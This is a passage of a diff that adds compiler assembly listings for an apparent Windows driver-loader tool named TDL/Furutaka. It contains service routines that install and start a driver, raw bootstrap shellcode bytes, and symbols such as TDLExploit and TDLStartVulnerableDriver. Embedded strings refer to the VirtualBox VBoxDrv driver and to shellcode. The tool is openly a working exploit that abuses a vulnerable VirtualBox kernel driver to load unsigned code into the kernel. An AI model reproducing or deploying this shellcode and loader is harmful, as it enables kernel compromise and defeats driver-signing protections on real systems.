+ jmp SHORT $LN1@scmOpenDev
+$LN2@scmOpenDev:
+; Line 118
+ test rbx, rbx
+ je SHORT $LN3@scmOpenDev
+; Line 119
+ mov QWORD PTR [rbx], rax
+; Line 120
+ jmp SHORT $LN4@scmOpenDev
+$LN3@scmOpenDev:
+; Line 122
+ mov rcx, rax
+ call QWORD PTR __imp_CloseHandle
+$LN4@scmOpenDev:
+; Line 125
+ mov eax, 1
+$LN1@scmOpenDev:
+; Line 126
+ mov rbx, QWORD PTR [rsp+208]
+ add rsp, 192 ; 000000c0H
+ pop rdi
+ ret 0
+scmOpenDevice ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmStartDriver
+_TEXT SEGMENT
+SchSCManager$ = 48
+DriverName$ = 56
+scmStartDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 69
+$LN7:
+ mov QWORD PTR [rsp+8], rbx
+ push rdi
+ sub rsp, 32 ; 00000020H
+; Line 73
+ mov r8d, 983551 ; 000f01ffH
+ call QWORD PTR __imp_OpenServiceW
+; Line 77
+ xor ebx, ebx
+ mov rdi, rax
+ test rax, rax
+ je SHORT $LN1@scmStartDr
+$LN2@scmStartDr:
+; Line 80
+ xor r8d, r8d
+ xor edx, edx
+ mov rcx, rdi
+ call QWORD PTR __imp_StartServiceW
+ test eax, eax
+ jne SHORT $LN4@scmStartDr
+ call QWORD PTR __imp_GetLastError
+ cmp eax, 1056 ; 00000420H
+ jne SHORT $LN5@scmStartDr
+$LN4@scmStartDr:
+ mov ebx, 1
+$LN5@scmStartDr:
+; Line 83
+ mov rcx, rdi
+ call QWORD PTR __imp_CloseServiceHandle
+; Line 85
+ mov eax, ebx
+$LN1@scmStartDr:
+; Line 86
+ mov rbx, QWORD PTR [rsp+48]
+ add rsp, 32 ; 00000020H
+ pop rdi
+ ret 0
+scmStartDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT scmInstallDriver
+_TEXT SEGMENT
+SchSCManager$ = 128
+DriverName$ = 136
+ServiceExe$ = 144
+scmInstallDriver PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\instdrv.c
+; Line 32
+$LN5:
+ mov rax, rsp
+ sub rsp, 120 ; 00000078H
+; Line 35
+ and QWORD PTR [rax-24], 0
+ mov r9d, 983551 ; 000f01ffH
+ and QWORD PTR [rax-32], 0
+ and QWORD PTR [rax-40], 0
+ and QWORD PTR [rax-48], 0
+ and QWORD PTR [rax-56], 0
+ mov QWORD PTR [rax-64], r8
+ mov r8, rdx
+ mov DWORD PTR [rax-72], 1
+ mov DWORD PTR [rax-80], 3
+ mov DWORD PTR [rax-88], 1
+ call QWORD PTR __imp_CreateServiceW
+; Line 49
+ test rax, rax
+ je SHORT $LN1@scmInstall
+$LN2@scmInstall:
+; Line 53
+ mov rcx, rax
+ call QWORD PTR __imp_CloseServiceHandle
+; Line 54
+ mov eax, 1
+$LN1@scmInstall:
+; Line 55
+ add rsp, 120 ; 00000078H
+ ret 0
+scmInstallDriver ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/main.asm b/Source/Furutaka/output/x64/Release/asmlist/main.asm
new file mode 100644
index 0000000..e93382e
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/main.asm
@@ -0,0 +1,3424 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC TDLBootstrapLoader_code
+PUBLIC g_lApplicationInstances
+PUBLIC g_hVBox
+PUBLIC g_VBoxInstalled
+PUBLIC g_NtBuildNumber
+_DATA SEGMENT
+COMM g_hInstance:QWORD
+_DATA ENDS
+_BSS SEGMENT
+g_VBoxInstalled DD 01H DUP (?)
+g_NtBuildNumber DD 01H DUP (?)
+_BSS ENDS
+_DATA SEGMENT
+g_hVBox DQ ffffffffffffffffH
+_DATA ENDS
+shrd SEGMENT
+g_lApplicationInstances DD 00H
+shrd ENDS
+CONST SEGMENT
+TDLBootstrapLoader_code DB 048H
+ DB 08bH
+ DB 0c4H
+ DB 041H
+ DB 054H
+ DB 048H
+ DB 081H
+ DB 0ecH
+ DB 090H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 089H
+ DB 058H
+ DB 010H
+ DB 04dH
+ DB 08bH
+ DB 0e0H
+ DB 048H
+ DB 089H
+ DB 068H
+ DB 018H
+ DB 048H
+ DB 08dH
+ DB 01dH
+ DB 0e2H
+ DB 0ffH
+ DB 0ffH
+ DB 0ffH
+ DB 04cH
+ DB 089H
+ DB 068H
+ DB 0e8H
+ DB 048H
+ DB 081H
+ DB 0c3H
+ DB 00H
+ DB 03H
+ DB 00H
+ DB 00H
+ DB 04cH
+ DB 089H
+ DB 070H
+ DB 0e0H
+ DB 04cH
+ DB 08bH
+ DB 0eaH
+ DB 04cH
+ DB 089H
+ DB 078H
+ DB 0d8H
+ DB 04cH
+ DB 08bH
+ DB 0c9H
+ DB 033H
+ DB 0c9H
+ DB 041H
+ DB 0b8H
+ DB 054H
+ DB 064H
+ DB 06cH
+ DB 053H
+ DB 04cH
+ DB 063H
+ DB 073H
+ DB 03cH
+ DB 04cH
+ DB 03H
+ DB 0f3H
+ DB 045H
+ DB 08bH
+ DB 07eH
+ DB 050H
+ DB 041H
+ DB 08dH
+ DB 097H
+ DB 00H
+ DB 010H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0ffH
+ DB 0d1H
+ DB 045H
+ DB 033H
+ DB 0c9H
+ DB 048H
+ DB 08dH
+ DB 0a8H
+ DB 00H
+ DB 010H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 081H
+ DB 0e5H
+ DB 00H
+ DB 0f0H
+ DB 0ffH
+ DB 0ffH
+ DB 041H
+ DB 083H
+ DB 0beH
+ DB 084H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 05H
+ DB 0fH
+ DB 086H
+ DB 0b0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 08bH
+ DB 08eH
+ DB 0b0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 085H
+ DB 0c9H
+ DB 0fH
+ DB 084H
+ DB 0a1H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 089H
+ DB 0b4H
+ DB 024H
+ DB 0b8H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 04cH
+ DB 08dH
+ DB 04H
+ DB 0bH
+ DB 041H
+ DB 08bH
+ DB 0b6H
+ DB 0b4H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 04cH
+ DB 08bH
+ DB 0ddH
+ DB 04dH
+ DB 02bH
+ DB 05eH
+ DB 030H
+ DB 048H
+ DB 089H
+ DB 0bcH
+ DB 024H
+ DB 088H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 08bH
+ DB 0f9H
+ DB 085H
+ DB 0f6H
+ DB 074H
+ DB 068H
+ DB 0fH
+ DB 01fH
+ DB 044H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0b9H
+ DB 08H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 04dH
+ DB 08dH
+ DB 050H
+ DB 08H
+ DB 045H
+ DB 039H
+ DB 048H
+ DB 04H
+ DB 076H
+ DB 043H
+ DB 041H
+ DB 0fH
+ DB 0b7H
+ DB 02H
+ DB 08bH
+ DB 0c8H
+ DB 0c1H
+ DB 0e9H
+ DB 0cH
+ DB 083H
+ DB 0f9H
+ DB 03H
+ DB 074H
+ DB 017H
+ DB 083H
+ DB 0f9H
+ DB 0aH
+ DB 075H
+ DB 022H
+ DB 041H
+ DB 08bH
+ DB 010H
+ DB 025H
+ DB 0ffH
+ DB 0fH
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08dH
+ DB 0cH
+ DB 03H
+ DB 04cH
+ DB 01H
+ DB 01cH
+ DB 0aH
+ DB 0ebH
+ DB 010H
+ DB 041H
+ DB 08bH
+ DB 010H
+ DB 025H
+ DB 0ffH
+ DB 0fH
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08dH
+ DB 0cH
+ DB 03H
+ DB 044H
+ DB 01H
+ DB 01cH
+ DB 0aH
+ DB 049H
+ DB 083H
+ DB 0c2H
+ DB 02H
+ DB 041H
+ DB 083H
+ DB 0c1H
+ DB 02H
+ DB 045H
+ DB 03bH
+ DB 048H
+ DB 04H
+ DB 072H
+ DB 0bdH
+ DB 041H
+ DB 08bH
+ DB 040H
+ DB 04H
+ DB 03H
+ DB 0f8H
+ DB 04cH
+ DB 03H
+ DB 0c0H
+ DB 03bH
+ DB 0feH
+ DB 072H
+ DB 0a0H
+ DB 045H
+ DB 033H
+ DB 0c9H
+ DB 048H
+ DB 08bH
+ DB 0b4H
+ DB 024H
+ DB 0b8H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08bH
+ DB 0bcH
+ DB 024H
+ DB 088H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 049H
+ DB 08bH
+ DB 0d7H
+ DB 04cH
+ DB 08bH
+ DB 07cH
+ DB 024H
+ DB 070H
+ DB 048H
+ DB 0c1H
+ DB 0eaH
+ DB 03H
+ DB 048H
+ DB 085H
+ DB 0d2H
+ DB 074H
+ DB 01dH
+ DB 048H
+ DB 08bH
+ DB 0cdH
+ DB 048H
+ DB 02bH
+ DB 0ddH
+ DB 066H
+ DB 0fH
+ DB 01fH
+ DB 044H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08bH
+ DB 04H
+ DB 0bH
+ DB 048H
+ DB 089H
+ DB 01H
+ DB 048H
+ DB 08dH
+ DB 049H
+ DB 08H
+ DB 048H
+ DB 083H
+ DB 0eaH
+ DB 01H
+ DB 075H
+ DB 0efH
+ DB 04cH
+ DB 089H
+ DB 04cH
+ DB 024H
+ DB 030H
+ DB 04cH
+ DB 08dH
+ DB 044H
+ DB 024H
+ DB 040H
+ DB 04cH
+ DB 089H
+ DB 08cH
+ DB 024H
+ DB 0a0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08dH
+ DB 08cH
+ DB 024H
+ DB 0a0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 04cH
+ DB 089H
+ DB 04cH
+ DB 024H
+ DB 048H
+ DB 0fH
+ DB 057H
+ DB 0c0H
+ DB 04cH
+ DB 089H
+ DB 04cH
+ DB 024H
+ DB 050H
+ DB 0baH
+ DB 0ffH
+ DB 0ffH
+ DB 01fH
+ DB 00H
+ DB 0f3H
+ DB 0fH
+ DB 07fH
+ DB 044H
+ DB 024H
+ DB 060H
+ DB 0c7H
+ DB 044H
+ DB 024H
+ DB 040H
+ DB 030H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 0c7H
+ DB 044H
+ DB 024H
+ DB 058H
+ DB 00H
+ DB 02H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 08bH
+ DB 046H
+ DB 028H
+ DB 048H
+ DB 03H
+ DB 0c5H
+ DB 048H
+ DB 089H
+ DB 044H
+ DB 024H
+ DB 028H
+ DB 04cH
+ DB 089H
+ DB 04cH
+ DB 024H
+ DB 020H
+ DB 045H
+ DB 033H
+ DB 0c9H
+ DB 041H
+ DB 0ffH
+ DB 0d5H
+ DB 04cH
+ DB 08bH
+ DB 074H
+ DB 024H
+ DB 078H
+ DB 04cH
+ DB 08bH
+ DB 0acH
+ DB 024H
+ DB 080H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08bH
+ DB 0acH
+ DB 024H
+ DB 0b0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08bH
+ DB 09cH
+ DB 024H
+ DB 0a8H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 085H
+ DB 0c0H
+ DB 078H
+ DB 0bH
+ DB 048H
+ DB 08bH
+ DB 08cH
+ DB 024H
+ DB 0a0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0ffH
+ DB 0d4H
+ DB 048H
+ DB 081H
+ DB 0c4H
+ DB 090H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 05cH
+ DB 0c3H
+TDLBootstrapLoader_code_w10rs2 DB 040H
+ DB 053H
+ DB 055H
+ DB 056H
+ DB 048H
+ DB 083H
+ DB 0ecH
+ DB 020H
+ DB 04cH
+ DB 08bH
+ DB 0c9H
+ DB 04cH
+ DB 089H
+ DB 07cH
+ DB 024H
+ DB 050H
+ DB 048H
+ DB 08dH
+ DB 01dH
+ DB 0e9H
+ DB 0ffH
+ DB 0ffH
+ DB 0ffH
+ DB 033H
+ DB 0c9H
+ DB 048H
+ DB 081H
+ DB 0c3H
+ DB 00H
+ DB 03H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0b8H
+ DB 054H
+ DB 064H
+ DB 06cH
+ DB 053H
+ DB 048H
+ DB 063H
+ DB 06bH
+ DB 03cH
+ DB 048H
+ DB 03H
+ DB 0ebH
+ DB 044H
+ DB 08bH
+ DB 07dH
+ DB 050H
+ DB 041H
+ DB 08dH
+ DB 097H
+ DB 00H
+ DB 010H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0ffH
+ DB 0d1H
+ DB 048H
+ DB 08dH
+ DB 0b0H
+ DB 00H
+ DB 010H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 081H
+ DB 0e6H
+ DB 00H
+ DB 0f0H
+ DB 0ffH
+ DB 0ffH
+ DB 083H
+ DB 0bdH
+ DB 084H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 05H
+ DB 0fH
+ DB 086H
+ DB 0a5H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 08bH
+ DB 08dH
+ DB 0b0H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 085H
+ DB 0c9H
+ DB 0fH
+ DB 084H
+ DB 097H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 089H
+ DB 07cH
+ DB 024H
+ DB 040H
+ DB 04cH
+ DB 08dH
+ DB 04H
+ DB 0bH
+ DB 04cH
+ DB 08bH
+ DB 0deH
+ DB 04cH
+ DB 089H
+ DB 074H
+ DB 024H
+ DB 048H
+ DB 04cH
+ DB 02bH
+ DB 05dH
+ DB 030H
+ DB 033H
+ DB 0ffH
+ DB 044H
+ DB 08bH
+ DB 0b5H
+ DB 0b4H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 045H
+ DB 085H
+ DB 0f6H
+ DB 074H
+ DB 06aH
+ DB 066H
+ DB 0fH
+ DB 01fH
+ DB 084H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 041H
+ DB 0b9H
+ DB 08H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 04dH
+ DB 08dH
+ DB 050H
+ DB 08H
+ DB 045H
+ DB 039H
+ DB 048H
+ DB 04H
+ DB 076H
+ DB 043H
+ DB 041H
+ DB 0fH
+ DB 0b7H
+ DB 02H
+ DB 08bH
+ DB 0c8H
+ DB 0c1H
+ DB 0e9H
+ DB 0cH
+ DB 083H
+ DB 0f9H
+ DB 03H
+ DB 074H
+ DB 017H
+ DB 083H
+ DB 0f9H
+ DB 0aH
+ DB 075H
+ DB 022H
+ DB 041H
+ DB 08bH
+ DB 010H
+ DB 025H
+ DB 0ffH
+ DB 0fH
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08dH
+ DB 0cH
+ DB 03H
+ DB 04cH
+ DB 01H
+ DB 01cH
+ DB 0aH
+ DB 0ebH
+ DB 010H
+ DB 041H
+ DB 08bH
+ DB 010H
+ DB 025H
+ DB 0ffH
+ DB 0fH
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08dH
+ DB 0cH
+ DB 03H
+ DB 044H
+ DB 01H
+ DB 01cH
+ DB 0aH
+ DB 049H
+ DB 083H
+ DB 0c2H
+ DB 02H
+ DB 041H
+ DB 083H
+ DB 0c1H
+ DB 02H
+ DB 045H
+ DB 03bH
+ DB 048H
+ DB 04H
+ DB 072H
+ DB 0bdH
+ DB 041H
+ DB 08bH
+ DB 040H
+ DB 04H
+ DB 03H
+ DB 0f8H
+ DB 04cH
+ DB 03H
+ DB 0c0H
+ DB 041H
+ DB 03bH
+ DB 0feH
+ DB 072H
+ DB 09fH
+ DB 048H
+ DB 08bH
+ DB 07cH
+ DB 024H
+ DB 040H
+ DB 04cH
+ DB 08bH
+ DB 074H
+ DB 024H
+ DB 048H
+ DB 049H
+ DB 08bH
+ DB 0d7H
+ DB 04cH
+ DB 08bH
+ DB 07cH
+ DB 024H
+ DB 050H
+ DB 048H
+ DB 0c1H
+ DB 0eaH
+ DB 03H
+ DB 048H
+ DB 085H
+ DB 0d2H
+ DB 074H
+ DB 025H
+ DB 048H
+ DB 08bH
+ DB 0ceH
+ DB 048H
+ DB 02bH
+ DB 0deH
+ DB 0fH
+ DB 01fH
+ DB 040H
+ DB 00H
+ DB 066H
+ DB 066H
+ DB 0fH
+ DB 01fH
+ DB 084H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 00H
+ DB 048H
+ DB 08bH
+ DB 04H
+ DB 0bH
+ DB 048H
+ DB 089H
+ DB 01H
+ DB 048H
+ DB 08dH
+ DB 049H
+ DB 08H
+ DB 048H
+ DB 083H
+ DB 0eaH
+ DB 01H
+ DB 075H
+ DB 0efH
+ DB 08bH
+ DB 045H
+ DB 028H
+ DB 048H
+ DB 03H
+ DB 0c6H
+ DB 048H
+ DB 083H
+ DB 0c4H
+ DB 020H
+ DB 05eH
+ DB 05dH
+ DB 05bH
+ DB 048H
+ DB 0ffH
+ DB 0e0H
+CONST ENDS
+PUBLIC TDLVBoxInstalled
+PUBLIC TDLGetProcAddress
+PUBLIC TDLResolveKernelImport
+PUBLIC TDLExploit
+PUBLIC TDLMapDriver
+PUBLIC TDLStartVulnerableDriver
+PUBLIC TDLStopVulnerableDriver
+PUBLIC TDLProcessCommandLine
+PUBLIC TDLMain
+PUBLIC ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ ; `string'
+PUBLIC ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; `string'
+PUBLIC ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_08EFILHJLF@furutaka@ ; `string'
+PUBLIC ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ ; `string'
+PUBLIC ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ ; `string'
+PUBLIC ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ ; `string'
+PUBLIC ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string'
+PUBLIC ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ ; `string'
+PUBLIC ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
+PUBLIC ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ ; `string'
+PUBLIC ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ ; `string'
+PUBLIC ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ ; `string'
+PUBLIC ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
+PUBLIC ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ ; `string'
+PUBLIC ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ ; `string'
+PUBLIC ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; `string'
+PUBLIC ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ ; `string'
+PUBLIC ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ ; `string'
+PUBLIC ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; `string'
+PUBLIC ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ ; `string'
+PUBLIC ??_C@_07IPICGNAN@ZwClose@ ; `string'
+PUBLIC ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; `string'
+PUBLIC ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ ; `string'
+PUBLIC ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; `string'
+PUBLIC ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ ; `string'
+PUBLIC ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ ; `string'
+PUBLIC ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ ; `string'
+PUBLIC ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ ; `string'
+PUBLIC ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ ; `string'
+PUBLIC ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; `string'
+PUBLIC ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; `string'
+PUBLIC ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ ; `string'
+PUBLIC ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ ; `string'
+PUBLIC ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ ; `string'
+PUBLIC ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ ; `string'
+PUBLIC ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
+PUBLIC ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ ; `string'
+PUBLIC ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
+PUBLIC ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ ; `string'
+PUBLIC ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
+PUBLIC ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string'
+PUBLIC ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string'
+PUBLIC ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ ; `string'
+PUBLIC ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ ; `string'
+PUBLIC ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; `string'
+PUBLIC ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
+PUBLIC ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ ; `string'
+PUBLIC ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
+PUBLIC ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ ; `string'
+PUBLIC ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ ; `string'
